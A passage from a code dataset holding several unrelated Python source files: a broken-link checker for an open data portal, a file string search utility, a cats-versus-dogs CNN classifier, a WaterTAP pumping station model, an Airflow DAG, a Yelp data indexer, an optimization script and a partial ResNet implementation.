'name_fr': res['name_translated']['fr'],\n 'year': timestamp.year if timestamp else None,\n 'month': timestamp.month if timestamp else None,\n 'link': url,\n })\n \n\n #write to csv\n count, count2 = 0, 0\n portal_type_dict = {'dataset': \"Open Data / Données ouvertes\",\n 'info': \"Open Information / Information ouverte\",\n }\n for id, res in data.items():\n status = res['status'] if res['status']!= -1 else 'timeout / temps libre'\n portal_type = portal_type_dict.get(res['portal_type'], None)\n line=[res['metadata_id'], portal_type, res['record_name_en'], res['record_name_fr'],\n res['org_name_en'], res['org_name_fr'], res['name_en'], res['name_fr'],\n res['year'], res['month'], res['link'], status]\n out.writerow(line)\n count += 1\n if status == 'timeout / temps libre':\n count2 += 1\n outf.close()\n print(self.env.info())\n print(self.env.stat())\n print('total {0} dumped, timeout_count {1}'.format(count, count2))\n\n def searchUrl(self, url):\n with self.env.begin() as txn:\n details =txn.get(url.encode('utf-8'))\n if details:\n details = json.loads(details.decode('utf-8'))\n print(details)\n else:\n print('Not found')\n\n def addOrg(self):\n for records in self.download():\n urls = {}\n with self.env.begin() as txn:\n for record in records:\n for res in record['resources']:\n if (not res['url_type']) and res.get('url'):\n url= res['url']\n try:\n details =txn.get(url.encode('utf-8'))\n except:\n traceback.print_exc()\n sys.exit(-1)\n if details:\n details = json.loads(details.decode('utf-8'))\n if (not details.get('org')) and record.get('organization'):\n try:\n details['org']={'name': record['organization']['name'],\n 'title': record['organization']['title']}\n urls[url] = details\n except:\n pass\n with self.env.begin(write=True) as txn:\n for url, details in urls.items():\n txn.put(url.encode('utf-8'), json.dumps(details).encode('utf-8'))\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Search portal records broken resource link')\n parser.add_argument(\"--file\", dest=\"file\", help=\"site file\")\n parser.add_argument(\"--quiet\", dest=\"verbose\",default=True)\n parser.add_argument(\"--dump\", dest=\"dump\",action='store_true',default=False)\n parser.add_argument(\"--search\", dest=\"search\")\n parser.add_argument(\"--org\", dest=\"org\", action='store_true',default=False)\n\n options = parser.parse_args()\n\n user_agent = None\n\n site = Records(options.file, options.verbose)\n if options.dump:\n site.dumpBrokenLink_v2()\n return\n elif options.search:\n site.searchUrl(options.search)\n return\n elif options.org:\n site.addOrg()\n return\n site.get_resources()\n\n\nif __name__ == '__main__':\n main()\n sys.exit(0)\n","sub_path":"browse_resources.py","file_name":"browse_resources.py","file_ext":"py","file_size_in_byte":15101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"191343924","text":"import os\nimport time\nfrom collections import defaultdict\nimport inspect\n\nIMPORT_WORDS = ['import', 'from']\n\ndef find_in_files(root_dir, f_types_list, seek_strings_list):\n \"\"\"search files in a directory tree for strings\n \n Args:\n root_dir: search tree root\n f_types_list: list of file extensions (with '.') like ['.py', '.wdl', '.json', 'etc']\n seek_strings_list: list of strings to hunt for in files of f-type in the code-rood_dir\n \n Returns:\n file_targets_line: dict of file-names: dict of locations for seed strings\n target_files_dict: dict of seek-list-string: to list of files containing it\n (empty if no seek_list strings found)\n \"\"\"\n search_start_time = time.time()\n number_of_files_checked = 0\n \n # initialize the (empty) return values\n file_targets_line = defaultdict(dict)\n target_files_dict = defaultdict(list)\n \n # fail immediately if the root directory is not available\n if not os.path.isdir(root_dir):\n print('Unable to locate root directory:\\n', root_dir)\n return file_targets_line, target_files_dict\n \n # guard the file types list input\n if isinstance(f_types_list, str):\n f_types = [f_types_list]\n elif isinstance(f_types_list, list):\n f_types = f_types_list\n else:\n print('Unable to process file types input. Need: [\".py\", \".ipynb\"]\\nGot:\\n', f_types_list)\n return file_targets_line, target_files_dict\n \n # guard user misuse where file extensions do not start with period character\n for i in range(len(f_types_list)):\n if f_types_list[i][0] != '.':\n f_types_list[i] = ''.join('.', f_types_list[i])\n \n # guard the list of strings to find in the files of type\n if isinstance(seek_strings_list, str):\n seek_list = [seek_strings_list]\n elif isinstance(seek_strings_list, list):\n seek_list = seek_strings_list\n else:\n print('Bad seek string input. Need: [\"ducks\", \"turles\"]\\nGot:\\n', seek_strings_list)\n return file_targets_line, target_files_dict\n \n # for every directory in the input root directory\n for d, dl, fl in os.walk(root_dir):\n \n # for each file in that directory\n for f in fl:\n \n # it the file is of one of the input types\n if os.path.splitext(f)[1] in f_types:\n \n full_file = os.path.join(d, f)\n \n lines = []\n \n try:\n with open(full_file, 'r') as fh:\n lines = fh.readlines()\n \n except:\n print('Unable to open file:\\n%s\\n', full_file)\n \n finally:\n \n # if the file was opened and not empty\n if len(lines) > 0:\n number_of_files_checked += 1\n \n # read each line in the file\n for line_n in range(len(lines)):\n line = lines[line_n]\n \n # check each string in the input list\n for s in seek_list:\n \n if s in line:\n \n # append the dictionary of target_word : files\n target_files_dict[s].append(full_file)\n \n # Note: this will require reader to use the same space replacement chars\n s_line = s.replace(' ', '_')\n \n # add the line number to the dictionary of files.target_word : locations\n if s_line in file_targets_line[full_file]:\n file_targets_line[full_file][s_line].append(line_n)\n \n else:\n file_targets_line[full_file][s_line] = [line_n]\n\n # alphabetize the target-word : filename dictionary\n if len(target_files_dict) > 1:\n for k in target_files_dict.keys():\n target_files_dict[k] = sorted(list(set(target_files_dict[k])))\n \n # Brag about it (er maybe not)\n tt = time.time() - search_start_time\n print('%s searched in %i files in %0.3f s'%(inspect.stack()[0][3], number_of_files_checked, tt))\n \n return file_targets_line, target_files_dict\n","sub_path":"src/stringy_stuff.py","file_name":"stringy_stuff.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"339991802","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport os\nimport csv\nfrom random import shuffle\nimport tflearn\nfrom tflearn.layers.conv import conv_2d, max_pool_2d\nfrom tflearn.layers.core import input_data, dropout, fully_connected\nfrom tflearn.layers.estimator import regression\nimport tensorflow as tf\n\ndir_train = '/home/srikumar/Desktop/ENPM673_Perception_for_autonomous_robots/Project6/train/'\ndir_test = '/home/srikumar/Desktop/ENPM673_Perception_for_autonomous_robots/Project6/test1/'\nsize= 200\nalpha = 0.001\nepoch = 15\nname = 'data-{}-{}-{}.model'.format(alpha,epoch, '2conv-basic')\n\ndef label_name(image): #To split names to dog and cats \n name = image.split('.')[0]\n if name =='cat':\n return [1,0]\n elif name=='dog':\n return [0,1]\n \ndef create_train_data():\n training_data = []\n for im in os.listdir(dir_train):\n label = label_name(im)\n path = os.path.join(dir_train,im)\n new_img = cv2.resize(cv2.imread(path,cv2.IMREAD_GRAYSCALE), (size,size))\n training_data.append([np.array(new_img),np.array(label)])\n shuffle(training_data) #To just shuffle data and make it random, and avoid overfitting\n np.save('train_set.npy', training_data)\n return training_data\n\n\ndef process_test_data():\n test_data = []\n for im in os.listdir(dir_test):\n path = os.path.join(dir_test,im)\n num = im.split('.')[0]\n new_img = cv2.resize(cv2.imread(path,cv2.IMREAD_GRAYSCALE), (size,size))\n test_data.append([np.array(new_img),num])\n test_data.sort(key=lambda x:x[1])\n shuffle(test_data) #To just shuffle data and make it random, and avoid overfitting\n np.save('test_set.npy', test_data)\n return test_data\n\ndef validate_train_set(c_net,train_set):\n \n #First layer\n #For ouput filter size - 32\n c_net = conv_2d(c_net, 32, 3, activation='relu', padding='same')\n c_net = max_pool_2d(c_net, 3)\n \n #Second layer\n #For ouput filter size - 64\n c_net = conv_2d(c_net, 64, 3, activation='relu')\n c_net = max_pool_2d(c_net, 3)\n \n #Third layer\n #For ouput filter size - 128\n c_net = conv_2d(c_net, 128, 3, activation='relu')\n c_net = max_pool_2d(c_net, 3)\n \n #Fourth layer\n #For ouput filter size - 128\n c_net = conv_2d(c_net, 64, 3, activation='relu')\n c_net = max_pool_2d(c_net, 3)\n \n \n #Fifth layer\n #For ouput filter size - 128\n c_net = conv_2d(c_net, 128, 3, activation='relu')\n c_net = max_pool_2d(c_net, 3)\n \n #Sixth layer\n #For ouput filter size - 64\n c_net = conv_2d(c_net, 64, 3, activation='relu')\n c_net = max_pool_2d(c_net, 3)\n \n #Seventh layer\n #For ouput filter size - 32\n c_net = conv_2d(c_net, 32, 3, activation='relu')\n c_net = max_pool_2d(c_net, 3)\n \n #Fully connected layer with 'relu' activation\n c_net = fully_connected(c_net, 1024, activation='relu')\n \n #drop_out to avoid over-fitting\n c_net = dropout(c_net, 0.9)\n \n #Fully connected layer with 'softmax' activation\n c_net = fully_connected(c_net, 2, activation='softmax')\n c_net = regression(c_net, optimizer='adam', learning_rate = alpha, loss = 'categorical_crossentropy', name='targets')\n \n model = tflearn.DNN(c_net, tensorboard_dir='log')\n \n if os.path.exists('{}.meta'.format(name)):\n model.load(name)\n print('model loaded!')\n return model\n \n #Creating 2 new list from train_set and labling them as testing and training sub data sets\n train_sub = train_set[:-2500] #choosing 24000 sets as train dataset \n test_sub = train_set[-2500:] #choosing last 1000 as the test dataset\n \n #for fit\n train_x = np.array([i[0] for i in train_sub]).reshape(-1, size, size, 1)\n train_y = [i[1] for i in train_sub]\n \n #for testing accuracy\n test_x = np.array([i[0] for i in test_sub]).reshape(-1, size, size, 1)\n test_y = [i[1] for i in test_sub]\n \n model.fit({'input': train_x}, {'targets': train_y}, n_epoch=epoch, validation_set=({'input': test_x}, {'targets': test_y}),snapshot_step=500, show_metric=True)\n model.save(name)\n \n return model\n \ndef run_for_test(model,test_set):\n fig=plt.figure()\n \n print(\"writing onto files: \\n\")\n \n with open('submission_file.csv','w') as f:\n f.write('id,label\\n')\n \n with open('submission_file.csv','a') as f:\n for data in test_set:\n img_num = data[1]\n img_data = data[0]\n orig = img_data\n data = img_data.reshape(size,size,1)\n model_out = model.predict([data])[0]\n f.write('{},{}\\n'.format(img_num,model_out[1]))\n f.close()\n \n #For non rounded file \n csv1 = 'submission_file.csv'\n file = open(csv1, newline='\\n')\n reader = csv.reader(file)\n header = next(reader)\n data = []\n for row in reader:\n img_num = int(row[0])\n d_or_c = float(row[1])\n data.append([img_num, d_or_c])\n \n data.sort(key = lambda x: x[0])\n new_file = 'submission_file_sorted.csv'\n file = open(new_file, 'w')\n writer = csv.writer(file)\n writer.writerow([\"id\", \"label\"])\n for d in data:\n writer.writerow([d[0],d[1]]) \n for num,data in enumerate(test_set[:12]):\n img_num = data[1]\n img_data = data[0]\n \n y = fig.add_subplot(3,4,num+1)\n orig = img_data\n data = img_data.reshape(size,size,1)\n model_out = model.predict([data])[0]\n \n # for rounded file\n csv1 = 'submission_file.csv'\n file = open(csv1, newline='\\n')\n reader = csv.reader(file)\n header = next(reader)\n data = []\n for row in reader:\n img_num = int(row[0])\n d_or_c = float(row[1])\n if d_or_c > 0.5:\n d_or_c = 1\n else:\n d_or_c = 0\n data.append([img_num, d_or_c])\n \n data.sort(key = lambda x: x[0])\n new_file = 'submission_file_roundedandsorted.csv'\n file = open(new_file, 'w')\n writer = csv.writer(file)\n writer.writerow([\"id\", \"label\"])\n for d in data:\n writer.writerow([d[0],d[1]]) \n for num,data in enumerate(test_set[:12]):\n img_num = data[1]\n img_data = data[0]\n \n y = fig.add_subplot(3,4,num+1)\n orig = img_data\n data = img_data.reshape(size,size,1)\n model_out = model.predict([data])[0]\n \n if np.argmax(model_out) == 1: \n str_label='Dog'\n else: \n str_label='Cat'\n \n y.imshow(orig,cmap='gray')\n plt.title(str_label)\n y.axes.get_xaxis().set_visible(False)\n y.axes.get_yaxis().set_visible(False)\n plt.show()\n plt.savefig('cats_and_dogs_epoch_{}'.format(epoch))\n plt.pause(10)\n\n \n \ndef main():\n \n #next four lines are to be executed just once - loading testing and training data sets\n print(\"Creating training dataset... \\n\")\n train_set = create_train_data()\n print(\"Processing testing dataset... \\n\")\n test_set = process_test_data()\n \n #to reset graph for every run\n tf.reset_default_graph()\n \n #workaround for earlier verison of numpy to use np.load \n np_load_old = np.load\n np.load = lambda *a,**k: np_load_old(*a, allow_pickle=True, **k) # modify the default parameters of np.load\n #loading training data\n train_set = np.load('train_set.npy') #len 25000\n test_set = np.load('test_set.npy') #len 12500\n #restoring to curret version\n np.load = np_load_old\n \n #creating flattened image and sending as input\n c_net = input_data(shape = [None,size,size,1], name='input')\n \n #training dataset validation and preparation\n model = validate_train_set(c_net,train_set)\n \n #running for test dataset\n run_for_test(model, test_set)\n \nif __name__ == '__main__':\n main()","sub_path":"Dogs and Cats detection - CNN/catsanddogs.py","file_name":"catsanddogs.py","file_ext":"py","file_size_in_byte":7841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"81527074","text":"#################################################################################\n# WaterTAP Copyright (c) 2020-2023, The Regents of the University of California,\n# through Lawrence Berkeley National Laboratory, Oak Ridge National Laboratory,\n# National Renewable Energy Laboratory, and National Energy Technology\n# Laboratory (subject to receipt of any required approvals from the U.S. Dept.\n# of Energy). All rights reserved.\n#\n# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license\n# information, respectively. These files are also available online at the URL\n# \"https://github.com/watertap-org/watertap/\"\n#################################################################################\n\"\"\"\nThis module contains a zero-order representation of a water pumping station.\n\"\"\"\n\nfrom pyomo.environ import units as pyunits, Var\nfrom pyomo.common.config import ConfigValue, In\nfrom idaes.core import declare_process_block_class\nfrom watertap.core import build_pt, ZeroOrderBaseData\nfrom watertap.core.zero_order_electricity import _common\n\n# Some more information about this module\n__author__ = \"Adam Atia\"\n\n\n@declare_process_block_class(\"WaterPumpingStationZO\")\nclass WaterPumpingStationZOData(ZeroOrderBaseData):\n \"\"\"\n Zero-Order model for SW onshore intake operation.\n \"\"\"\n\n CONFIG = ZeroOrderBaseData.CONFIG()\n CONFIG.declare(\n \"fix_pump_power\",\n ConfigValue(\n default=True,\n domain=In([True, False]),\n description=\"Boolean flag for fixing pump power directly.\",\n doc=\"\"\"Indicates whether pump power should be fixed by the user or not.\n **default** - True.\n **Valid values:** {\n **True** - pump power (variable name \"electricity\") will be fixed by user and lift_height will not be fixed,\n **False** - pump power (variable name \"electricity\") is left unfixed and lift_height will be fixed,}\"\"\",\n ),\n )\n\n def build(self):\n super().build()\n\n self._tech_type = \"water_pumping_station\"\n\n build_pt(self)\n\n # create electricity variable and add to performance dictionary\n _common(self)\n\n self.lift_height = Var(\n self.flowsheet().time,\n initialize=100,\n units=pyunits.feet,\n doc=\"Lift height for pump\",\n )\n self.eta_pump = Var(\n self.flowsheet().time,\n initialize=0.9,\n units=pyunits.dimensionless,\n doc=\"Efficiency of pump\",\n )\n self.eta_motor = Var(\n self.flowsheet().time,\n initialize=0.9,\n units=pyunits.dimensionless,\n doc=\"Efficiency of motor\",\n )\n\n self._fixed_perf_vars.append(self.eta_pump)\n self._fixed_perf_vars.append(self.eta_motor)\n\n if not self.config.fix_pump_power:\n self._fixed_perf_vars.append(self.lift_height)\n else:\n self._fixed_perf_vars.append(self.electricity)\n\n @self.Constraint(\n self.flowsheet().time,\n doc=\"Constraint for electricity consumption based on \" \"pump flowrate.\",\n )\n def electricity_consumption(b, t):\n A = (\n 3960\n * pyunits.gallon\n * pyunits.foot\n / pyunits.minute\n / pyunits.horsepower\n )\n return b.electricity[t] == pyunits.convert(\n b.properties[t].flow_vol\n * b.lift_height[t]\n / (A * b.eta_pump[t] * b.eta_motor[t]),\n to_units=pyunits.kW,\n )\n","sub_path":"watertap/unit_models/zero_order/water_pumping_station_zo.py","file_name":"water_pumping_station_zo.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"255108762","text":"from airflow.models import DAG\nfrom airflow.operators import DataQualityOperator\nfrom airflow.operators import LoadFactOperator\n\nimport load_statements\n\n\ndef load_facts(parent_dag_name, child_dag_name, start_date, redshift_conn_id):\n dag = DAG(\n '%s.%s' % (parent_dag_name, child_dag_name),\n start_date=start_date,\n )\n\n load_fact_bookings = LoadFactOperator(\n task_id='load_bookings',\n dag=dag,\n redshift_conn_id=redshift_conn_id,\n sql=load_statements.LOAD_BOOKING_FACTS,\n table='fact_bookings'\n )\n\n run_quality_checks_facts = DataQualityOperator(\n task_id='data_quality_checks_facts',\n dag=dag,\n tables='fact_bookings',\n redshift_conn_id=redshift_conn_id,\n sql='SELECT COUNT(*) FROM {}'\n )\n\n load_fact_bookings >> run_quality_checks_facts\n\n return dag\n","sub_path":"airflow/dags/sub_load_facts.py","file_name":"sub_load_facts.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"180623393","text":"import json\n\ndef try_replace(x, delim=''):\n if not x:\n return ''\n return x.replace(',', delim)\n\ncounter = 0\n# Business data credit: https://www.yelp.com/dataset/documentation/main.\n# Only business data are used, no personal review information is necessary.\nwith open('/Users/swzheng/Downloads/yelp_dataset/yelp_academic_dataset_business.json', 'r') as fin, open('index.csv', 'w') as fout:\n for json_line in fin.readlines():\n if counter % 10000 == 0:\n print('%d records inserted' % counter)\n counter += 1\n business_obj = json.loads(json_line)\n fout.write('%s,%s,%s,%f,%f,%s\\n' % (\n try_replace(business_obj['name']),\n try_replace(business_obj['address']),\n try_replace(business_obj['city']),\n business_obj['latitude'],\n business_obj['longitude'],\n try_replace(business_obj['categories'], '.')))\n","sub_path":"build_index.py","file_name":"build_index.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"355068412","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport sys,os,shutil\nimport time\nimport random\nimport Optimization\nfrom optparse import OptionParser\nfrom subprocess import run,check_output\nimport damask\n\n#------------------------------------------------------------------------------------------------- #\n_ratio = None\nclass optimize(Optimization.Optimization):\n\n def id(self,x):\n return str(self.map2space(x[:self.dimension])).translate(str.maketrans(' []','___')) \n \n#===========================================\n def fitness(self,x):\n if self.id(x) in self.locations:\n self.curr_locations.append(np.append(x,self.locations[self.id(x)]))\n return self.locations[self.id(x)]\n\n xvalue = self.map2space(x[:self.dimension])[0]\n yvalue = self.map2space(x[:self.dimension])[1]\n fitness_value = (xvalue**2 + yvalue -11)**2 + (xvalue + yvalue**2 - 7 )**2 #https://en.wikipedia.org/wiki/Test_functions_for_optimization\n print('fitness {}'.format(fitness_value))\n self.locations[self.id(x)] = fitness_value\n \n if not options.concise:\n with open('{}/output_gen{}_{}.log'.format(options.root,self.generation+1,self.id(x)),'a') as file:\n file.write(\"\\n Generation %i \"%(self.generation+1))\n file.write(\"\\n +++++++++++++++++++++++++++++++++ current fitness and points +++++++++++++++++++++++++++\\n\")\n file.write(\"\\n fitness {}\".format(fitness_value))\n file.write(\"\\n points {} parameters{}\".format(x[:self.dimension],self.map2space(x[:self.dimension])))\n file.write(\"\\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\n\")\n file.close() \n \n return fitness_value\n\n#-------------------------------- main program starts here ----------------------------------------- #\n\nparser = OptionParser()\nparser.add_option( '--root',\n dest = 'root',\n type = 'string', metavar = 'string',\n help = ' desired root of this process ')\nparser.add_option('--restart', action=\"store_true\",\n dest=\"restart\",\n help=\"restart optimization\")\nparser.add_option('-c','--concise', action=\"store_true\",\n dest=\"concise\",\n help=\"concise outputs\")\nparser.add_option( '--points',\n dest = 'points_data',\n type = 'string', metavar = 'string',\n help = 'points for next generation ')\n\n#making the default values and let them show\nparser.set_defaults( concise = False,\n )\n(options,filenames) = parser.parse_args()\n\n\noptions.root = os.path.dirname(os.path.realpath(__file__)) if options.root == None else options.root\n\ntick = time.time()\nif options.restart:\n\n table1 = damask.ASCIItable(name = options.points_data, buffered = False)\n table1.head_read()\n table1.data_readArray()\n\n theOptimizer = optimize( method = 'neldermead',\n bounds = np.array([[-10,10],\n [-10,10],\n ]),\n tolerance = 0.01,\n root = options.root,\n concise_outputs = options.concise,\n rigid = True,\n restart = True,\n points_rs = table1.data,\n )\nelse:\n theOptimizer = optimize(method = 'neldermead',\n bounds = np.array([[-10,10],\n [-10,10],\n ]),\n tolerance = 0.01,\n root = options.root,\n concise_outputs = options.concise,\n rigid = True,\n )\n\ntheOptimizer.optimize(verbose = False)\ntock = time.time()\nprint(\"Time for simulation\",(tock - tick))\nprint(\"Cost {}\".format(theOptimizer.cost()))\nprint(\"Best parameters and fitness {}\".format(theOptimizer.best()))\nwith open(\"{}/output_{}.log\".format(options.root,theOptimizer.method),'a') as file:\n file.write(\"\\nTime for simulation {}\".format(tock - tick))\n file.write(\"\\nCost {}\".format(theOptimizer.cost()))\n file.write(\"\\nBest parameters and fitness {}\".format(theOptimizer.best()))","sub_path":"ExampleOptimization/test_HimmelblauNM/abaqus_optimize_Himmelblau_masterCode_NM.py","file_name":"abaqus_optimize_Himmelblau_masterCode_NM.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"208898997","text":"\"\"\"\n ResNet from 'Deep Residual Learning for Image Recognition', Kaiming He et al, CVPR 2015\n\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.hub import load_state_dict_from_url\n\nfrom model.model_utils import register\n\n\n# resnet variants\n__all__ = [\n 'ResNet', 'resnet18', 'resnet34', 'resnet50', 'resnet101',\n 'resnet152', 'resnext50_32x4d', 'resnext101_32x8d',\n 'wide_resnet50_2', 'wide_resnet101_2'\n]\n\n# urls to pretrained resnet models\nmodel_urls = {\n 'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',\n 'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',\n 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',\n 'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',\n 'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',\n 'resnext50_32x4d': 'https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth',\n 'resnext101_32x8d': 'https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth',\n 'wide_resnet50_2': 'https://download.pytorch.org/models/wide_resnet50_2-95faca4d.pth',\n 'wide_resnet101_2': 'https://download.pytorch.org/models/wide_resnet101_2-32ee1156.pth',\n}\n\n# define a conv-3x3 layer with padding\ndef conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1):\n \"\"\" 3x3 convolution with padding \"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=dilation,\n groups=groups, bias=False, dilation=dilation)\n\n\n# define a conv-1x1 layer -> used often, for simplicity\ndef conv1x1(in_planes, out_planes, stride=1):\n \"\"\" 1x1 convolution \"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)\n\n\nclass BasicBlock(nn.Module):\n \"\"\"\n Basic res-block for resnet\n\n structure: conv-3x3 -> bn -> relu -> conv-3x3 -> bn -> skip-connect -> relu\n\n input dimension = batch_size x inplanes x H x H\n output dimension = batch_size x planes x H/stride x H/stride\n\n \"\"\"\n\n expansion = 1\n\n def __init__(self, inplanes: int, planes: int, stride=1, downsample=None, groups=1,\n base_width=64, dilation=1, norm_layer=None):\n \"\"\"\n Constructor\n\n Args:\n inplanes: (int) number of input channels\n planes: (int) number of output channels\n stride: (int) stride\n downsample: () downsamples output fmaps -> require dimension matching for skip connection; must set if stride > 1\n groups: (int) BasicBlock only supports default=1\n base_width: (int) BasicBlock only supports default=64\n dilation: (int) dilated convolution; only supports default=1\n norm_layer: (nn.Module) normalization; default=BatchNorm2d\n\n base_width & groups are interfaces for BottleNeck block, here it is fixed to width=64 and groups=1 for no bottleneck\n\n \"\"\"\n\n super(BasicBlock, self).__init__()\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n if groups != 1 or base_width != 64:\n raise ValueError('BasicBlock class only supports groups=1 and base_width=64')\n if dilation > 1:\n raise ValueError('BasicBlock class only supports dilation=1')\n\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = norm_layer(planes)\n self.conv2 = conv3x3(planes, planes)\n self.bn2 = norm_layer(planes)\n self.downsample = downsample\n self.stride = stride\n\n self.dropout = nn.Dropout(p=0.2)\n\n def _forward_imp1(self, x):\n \"\"\" forward method: no dropout \"\"\"\n identity = x # batch_size x inplanes x H x H\n\n out = self.bn1(self.conv1(x)) # batch_size x planes x H/stride x H/stride -> downsamples if stride > 1\n out = F.relu(out, inplace=True)\n out = self.bn2(self.conv2(out)) # batch_size x planes x H/stride x H/stride -> maintain dimensions\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity # skip connection\n out = F.relu(out, inplace=True)\n\n return out # batch_size x planes x H/stride x H/stride\n\n def _forward_imp2(self, x):\n \"\"\" forward method: dropout after each conv filter \"\"\"\n identity = x # batch_size x inplanes x H x H\n\n out = self.bn1(self.conv1(x)) # batch_size x planes x H/stride x H/stride -> downsamples if stride > 1\n out = F.relu(out, inplace=True)\n out = self.dropout(out)\n out = self.bn2(self.conv2(out)) # batch_size x planes x H/stride x H/stride -> maintain dimensions\n out = self.dropout(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity # skip connection\n out = F.relu(out, inplace=True)\n\n return out # batch_size x planes x H/stride x H/stride\n\n def forward(self, x):\n \"\"\" forward method \"\"\"\n\n return self._forward_imp2(x)\n\n\nclass BottleNeck(nn.Module):\n \"\"\"\n Bottle-necked block\n\n structure: conv-1x1 (decrease width) -> bn/relu -> conv-3x3 (downsample?) -> bn/relu -> conv-1x1 (restore width) -> bn -> skip-connect concat -> relu\n\n input dimension = batch_size x inplanes x H x H\n output dimension = batch_size x planes*self.expansion x H/stride x H/stride\n\n \"\"\"\n\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,\n base_width=64, dilation=1, norm_layer=None):\n \"\"\"\n Constructor\n\n Args:\n inplanes: (int) number of input channels\n planes: (int) number of output channels = planes * self.expansion\n stride: (int) stride\n downsample: (nn.Module) downsamples output fmaps -> require dimension matching for skip connection; must set if stride > 1\n groups: (int) number of groups\n base_width: (int) number of channels per group\n dilation: (int) dilated convolution\n norm_layer: (nn.Module) normalization; default=BatchNorm2d\n\n bottleneck width = planes * base_width / 64 * groups\n - implemened as grouped convolution\n - base_width and groups are used to accomodate implementation of ResNeXt and wide_ResNets\n - for ResNeXt, specify bottleneck width = base_width and cardinality = groups\n - for wide_ResNet, double base_width\n - for vanilla ResNet, set base_width = 64, groups = 1, then bottleneck width = planes -> no bottleneck like BasicBlock\n - can tweak base_width, groups to alter bottleneck widths\n\n \"\"\"\n\n super(BottleNeck, self).__init__()\n\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n\n # bottleneck width, implemented from grouped convolution\n # in ResNeXt paper, base_width=4, groups=32, planes=256 -> width=128\n width = int(planes * (base_width / 64.)) * groups\n\n self.conv1 = conv1x1(inplanes, width)\n self.bn1 = norm_layer(width)\n self.conv2 = conv3x3(width, width, stride, groups, dilation)\n self.bn2 = norm_layer(width)\n self.conv3 = conv1x1(width, planes * self.expansion)\n self.bn3 = norm_layer(planes * self.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n self.dropout = nn.Dropout(p=0.2)\n\n def _forward_imp1(self, x):\n \"\"\" forward method for BottleNeck class: no dropout \"\"\"\n\n identity = x # batch_size x inplanes x H x H\n\n out = self.relu(self.bn1(self.conv1(x))) # batch_size x width x H x H\n out = self.relu(self.bn2(self.conv2(out))) # batch_size x width x H/stride x H/stride\n out = self.bn3(self.conv3(out)) # batch_size x planes*self.expansion x H/stride x H/stride\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity # skip connection\n out = self.relu(out)\n\n return out # batch_size x planes*self.expansion x H/stride x H/stride\n\n def _forward_imp2(self, x):\n \"\"\" forward method for BottleNeck class: dropout after each conv filter \"\"\"\n\n identity = x # batch_size x inplanes x H x H\n\n out = self.relu(self.bn1(self.conv1(x))) # batch_size x width x H x H\n out = self.dropout(out)\n out = self.relu(self.bn2(self.conv2(out))) # batch_size x width x H/stride x H/stride\n out = self.dropout(out)\n out = self.bn3(self.conv3(out)) # batch_size x planes*self.expansion x H/stride x H/stride\n out = self.dropout(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity # skip connection\n out = self.relu(out)\n\n return out # batch_size x planes*self.expansion x H/stride x H/stride\n\n def forward(self, x):\n \"\"\" forward method \"\"\"\n\n return self._forward_imp2(x)\n\n\nclass ResNet(nn.Module):\n \"\"\"\n ResNet\n\n An abstract network builder class to generate ResNet variants\n\n Common structure:\n\n - conv-7x7-s2 -> bn -> relu -> max_pool-3x3-s2\n - res-block (basic / bottleneck) stack: 1\n - res-block (basic / bottleneck) stack: 2\n - res-block (basic / bottleneck) stack: 3\n - res-block (basic / bottleneck) stack: 4\n - global average pool -> flatten -> fc\n\n \"\"\"\n\n def __init__(self, block, stacks, num_classes=10, zero_init_residual=True,\n groups=1, width_per_group=64, replace_stride_with_dilation=None,\n norm_layer=None):\n \"\"\"\n Constructor\n\n Args:\n block: (BasicBlock or BottleNeck class) type of residual block to use as building block for res-stacks\n stacks: (list) a list of 4 integers, each specifying the number of layers (residual blocks) in each of the 4 res-stacks\n num_class: (int) number of final fc layer outputs\n zero_init_residual: (bool) if true initialize the weights of the last BN layer in each residual block to zero\n groups: (int)\n width_per_group: (int)\n replace_stride_with_dilation: (tuple of 3 boolean values) specify whether or not to use dilated conv for\n residual stack 1~3 (strided stacks)\n norm_layer: (nn.Module) nomalization layer; default = nn.BatchNorm2d\n\n \"\"\"\n\n super(ResNet, self).__init__()\n\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n\n self._norm_layer = norm_layer\n self.inplanes = 